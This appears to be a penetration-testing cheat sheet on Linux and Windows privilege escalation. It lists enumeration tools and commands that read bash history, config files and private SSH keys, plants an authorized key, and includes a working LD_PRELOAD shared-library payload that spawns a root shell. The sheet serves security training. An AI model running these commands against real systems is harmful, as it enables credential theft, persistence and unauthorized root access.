# Privilege Escalation

## Enumeration Scripts

* [LinEnum](https://github.com/rebootuser/LinEnum.git)
* [Linuxprivchecker](https://github.com/sleventyeleven/linuxprivchecker)
* [Seatbelt](https://github.com/GhostPack/Seatbelt)
* [JAWS](https://github.com/411Hall/JAWS)
* [PEASS-ng](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite)

## Techniques

### Kernel Exploits

You can google known kernel exploits.

### Vulnerable Software

{% tabs %}
{% tab title="List packages (Linux)" %}

```bash
dpkg -l
```

{% endtab %}

{% tab title="List installed software (Windows)" %}

```powershell
dir C:\Program Files
```

{% endtab %}
{% endtabs %}

### User Privileges

{% tabs %}
{% tab title="Sudo" %}

```bash
sudo -l
```

{% endtab %}

{% tab title="SUID" %}

```bash
find / -perm /4000 2>/dev/null
```

{% endtab %}

{% tab title="SGID" %}

```bash
find / -perm /2000 2>/dev/null
```

{% endtab %}

{% tab title="SUID / SGID" %}

```bash
find / -perm /6000 2>/dev/null
```

{% endtab %}

{% tab title="Windows Token Privileges" %}

```powershell
whoami /priv
```

```powershell
whoami /all
```

{% endtab %}
{% endtabs %}

### Scheduled Tasks

{% tabs %}
{% tab title="Crontab directories" %}

```bash
/etc/crontab
/etc/cron.d
/var/spool/cron/crontabs/root
```

{% endtab %}

{% tab title="List crontab" %}

```bash
crontab -l
```

{% endtab %}

{% tab title="Edit a crontab" %}

```bash
crontab -e
```

{% endtab %}
{% endtabs %}

### Exposed Credentials

{% tabs %}
{% tab title="History" %}

<pre class="language-bash"><code class="lang-bash"><strong>cat ~/.bash_history
</strong></code></pre>

{% endtab %}

{% tab title="Configuration files" %}

```bash
cat /var/www/html/config.php
```

{% endtab %}
{% endtabs %}

### SSH Keys

{% tabs %}
{% tab title="Get private SSH Key" %}

```bash
cat /home/qu35t/.ssh/id_rsa
```

{% endtab %}

{% tab title="Generate SSH Key" %}

```bash
ssh-keygen -t ed25519 -f qu35t
```

{% endtab %}

{% tab title="Add an authorised key" %}

```bash
echo -n 'PUBLIC SSH KEY' > /home/qu35t/.ssh/authorized_keys
```

```bash
chmod 600 /home/qu35t/.ssh/authorized_keys
```

{% endtab %}

{% tab title="SSH with private SSH key" %}

```bash
ssh -i qu35t qu35t@10.10.10.10
```

{% endtab %}
{% endtabs %}

### LD\_PRELOAD

{% tabs %}
{% tab title="Program" %}

```bash
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>

void _init() {
    unsetenv("LD_PRELOAD");
    setresuid(0,0,0);
    system("/bin/bash -p");
}
```

{% endtab %}

{% tab title="Compile" %}

```bash
gcc -fPIC -shared -nostartfiles -o ./load.so ./ld.c
```

{% endtab %}

{% tab title="Load the library" %}

```bash
sudo LD_PRELOAD=/dev/shm/load.so /opt/script.sh
```

{% endtab %}
{% endtabs %}

## Windows

{% tabs %}
{% tab title="Unattended Windows Installations" %}

```powershell
C:\Unattend.xml
C:\Windows\Panther\Unattend.xml
C:\Windows\Panther\Unattend\Unattend.xml
C:\Windows\system32\sysprep.inf
C:\Windows\system32\sysprep\sysprep.xml
```

{% endtab %}

{% tab title="Powershell History" %}

```powershell
%userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
```

{% endtab %}

{% tab title="Saved Windows Credentials" %}

```powershell
cmdkey /list
```

```powershell
runas /savecred /user:admin cmd.exe
```

{% endtab %}

{% tab title="IIS Configuration" %}

```powershell
C:\inetpub\wwwroot\web.config
```

```powershell
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config
```

{% endtab %}
{% endtabs %}

{% tabs %}
{% tab title="Scheduled Tasks" %}

```powershell
schtasks /query /tn vulntask /fo list /v
```

```powershell
icacls c:\tasks\schtask.bat
```

{% endtab %}

{% tab title="List Services" %}

```
HKLM\SYSTEM\CurrentControlSet\Services\
```

```powershell
sc qc apphostsvc
```

{% endtab %}
{% endtabs %}

## References

* [GTFOBins](https://gtfobins.github.io/)
* [LOLBAS](https://lolbas-project.github.io)